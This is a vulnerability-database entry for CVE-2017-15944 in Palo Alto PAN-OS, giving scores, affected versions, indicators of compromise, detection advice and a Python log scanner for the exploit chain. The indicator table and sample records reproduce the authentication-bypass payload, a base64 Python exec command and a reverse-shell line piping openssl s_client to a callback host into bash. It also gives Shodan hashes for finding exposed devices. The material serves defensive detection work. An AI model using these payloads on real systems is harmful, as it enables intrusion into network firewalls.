CVE-2017-15944
published 2017-12-11

Priority P1 · 99 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability (due 2022-09-08)
Exploited in the wild
EPSS: 98.34% (99.9th percentile)
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.

Affected

5 ranges

Vendor             Product   Version range         Fixed in
paloalto           pan-os    (none listed)         (none listed)
paloaltonetworks   pan-os    < 6.1.19              6.1.19
paloaltonetworks   pan-os    >= 7.0.0, < 7.0.19    7.0.19
paloaltonetworks   pan-os    >= 7.1.0, < 7.1.14    7.1.14
paloaltonetworks   pan-os    >= 8.0.0, < 8.0.6     8.0.6

Detection & IOCs (extracted from sources)

Type      Indicator
url       /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";
path      /esp/cms_changeDeviceContext.esp
path      /php/utils/debug.php
path      /php/utils/router.php
path      /var/appweb/htdocs/api/c.php
path      /api/c.php
path      /opt/pancfg/mgmt/logdb/traffic/1/
path      /opt/pancfg/session/pan/user_tmp/
cookie    PHPSESSID=hacked
command   * -print -exec python -c exec("[base64 code..]".decode("base64")) ;
command   * -print -exec bash -c openssl${IFS}s_client${IFS}-quiet${IFS}-connect${IFS}#{cbhost}:#{cbport}|bash ;
path      /php/utils/router.php/Administrator.get
other     http.favicon.hash:-631559155
  • Detect the authentication bypass trigger: monitor HTTP GET requests to /esp/cms_changeDeviceContext.esp containing the session-corruption payload pattern (single-quote + ";user|s.) in the device parameter.
  • Detect exploitation of the XML injection / directory creation step: monitor HTTP POST requests to /php/utils/router.php containing 'Administrator.get' with 'async-mode' and directory traversal sequences (../../) in the JSON body.
  • Alert on creation of or HTTP access to the web shell path /var/appweb/htdocs/api/c.php or /api/c.php on PAN-OS management interfaces.
  • Alert on creation of the SUID root binary /bin/x on PAN-OS devices, which is dropped by the exploit payload.
  • Monitor the cron-executed scripts /usr/local/bin/genindex_batch.sh and /usr/local/bin/genindex.sh for anomalous directory names under /opt/pancfg/mgmt/logdb/ containing shell metacharacters or -exec arguments, which indicate exploitation of the command injection in the cron script.
  • Use Palo Alto Networks vulnerability signatures #40483 and #40484 (content update 756) applied to firewall rules protecting the management interface as an interim detection/mitigation control.
  • Identify exposed PAN-OS management interfaces via Shodan using favicon hash -631559155 or FOFA icon_hash=-631559155.
  • Detect the Metasploit module's reverse TLS staging callback: an outbound openssl s_client connection from the PAN-OS management plane to an external host, piped to bash.
  • PAN-OS 8.0 (before 8.0.6) is patched but was NOT remotely exploitable by an unauthenticated user via this specific vulnerability chain; the unauthenticated pre-auth RCE path applies to PAN-OS 6.1.18 and earlier, 7.0.18 and earlier, and 7.1.13 and earlier.
  • The exploit chain requires the web management interface to be reachable by the attacker; Palo Alto Networks recommends not exposing the management interface to the internet, which significantly reduces the attack surface.
  • The cron-based command injection stage fires every 15 minutes; exploitation can take up to 20 minutes end-to-end, so detection must account for delayed payload execution rather than immediate shell activity.
  • The authentication bypass does NOT produce a fully valid logged-in session; most PHP scripts will still fail, but the panAuthCheck directive in the web server is bypassed, allowing access to specific protected PHP endpoints.
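
The HTTP-layer indicators from the bullets above (stage 1 GET to cms_changeDeviceContext.esp, stage 2 POST to router.php, stage 3 access to /api/c.php, plus the forged PHPSESSID cookie) turned into a scanner over request records, as an added example that is not code from the page's sources, from Palo Alto Networks, or from the Metasploit module. It assumes a JSON-lines export in which each record carries method, uri, cookie and body (a reverse proxy or WAF export; an access log holding only the request line cannot feed the body check). The sample records are constructed, the POST body layout is a placeholder that merely carries the three substrings the stage 2 bullet names and is not the real request format, and the function and indicator names are the example's own.

```python
import json
import re
from urllib.parse import unquote, urlsplit

# Decoded form of the device= payload in the IOC list above
# (...a%27";user|s."1337"; decodes to ...a'";user|s."1337";).
SESSION_CORRUPT_RE = re.compile(r"'\s*\";user\|s\.")
TRAVERSAL_RE = re.compile(r"\.\./\.\./")
FORGED_COOKIE_RE = re.compile(r"(^|;\s*)PHPSESSID=hacked(;|$)")


def indicators_for(record):
    """Return the indicator names matched by one request record.

    record: dict with keys method, uri, cookie, body (cookie/body may be
    missing or empty). The field names are an assumption about the export.
    """
    method = (record.get("method") or "").upper()
    parts = urlsplit(record.get("uri") or "")
    path = parts.path
    body = record.get("body") or ""
    cookie = record.get("cookie") or ""
    hits = []

    # Stage 1: authentication bypass. The payload arrives percent-encoded in
    # the device parameter, so decode the whole query before matching. The raw
    # query is searched instead of parse_qs() output because the payload
    # contains ';', which older parse_qs versions treat as a separator.
    if method == "GET" and path == "/esp/cms_changeDeviceContext.esp":
        decoded_query = unquote(parts.query)
        if "device=" in decoded_query and SESSION_CORRUPT_RE.search(decoded_query):
            hits.append("auth_bypass_cms_changeDeviceContext")

    # Stage 2: XML injection / directory creation through router.php. All
    # three substrings must be present to keep the rule specific.
    if method == "POST" and path.startswith("/php/utils/router.php"):
        if "Administrator.get" in body and "async-mode" in body and TRAVERSAL_RE.search(body):
            hits.append("router_administrator_get_traversal")

    # Stage 3: any request for the dropped web shell.
    if path.endswith("/api/c.php"):
        hits.append("webshell_api_c_php")

    # Forged session cookie value from the IOC list. Weak on its own; treat it
    # as corroboration for the stage indicators.
    if FORGED_COOKIE_RE.search(cookie):
        hits.append("forged_phpsessid")

    return hits


def scan_log(lines):
    """Scan JSON-lines request records; return [(line_no, [indicator, ...]), ...] for hits only."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed export line: skip it rather than abort the scan
        hits = indicators_for(record)
        if hits:
            findings.append((line_no, hits))
    return findings


# Constructed sample records (not captured traffic). The body of the router.php
# record is a placeholder carrying the three substrings the detection needs.
SAMPLE_LOG = r'''
{"method": "GET", "uri": "/php/login.php", "cookie": "PHPSESSID=0a1b2c", "body": ""}
{"method": "GET", "uri": "/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\";", "cookie": "PHPSESSID=hacked", "body": ""}
{"method": "POST", "uri": "/php/utils/router.php/Administrator.get", "cookie": "PHPSESSID=hacked", "body": "{\"method\":\"Administrator.get\",\"data\":[\"async-mode\",\"../../../../opt/pancfg/mgmt/logdb/traffic/1/x\"]}"}
{"method": "GET", "uri": "/api/c.php?cmd=id", "cookie": "PHPSESSID=hacked", "body": ""}
{"method": "GET", "uri": "/esp/cms_changeDeviceContext.esp?device=serial1234", "cookie": "PHPSESSID=0a1b2c", "body": ""}
'''

if __name__ == "__main__":
    for line_no, hits in scan_log(SAMPLE_LOG.strip().splitlines()):
        print(f"record {line_no}: {', '.join(hits)}")
```

The benign cms_changeDeviceContext request in the last sample record is there on purpose: the endpoint is used by legitimate Panorama device-context switches, so alerting on the path alone would be noisy; the rule fires only when the decoded device value carries the session-corruption sequence.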

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      7.5     HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck             9.8     CRITICAL
cisa                  9.8     CRITICAL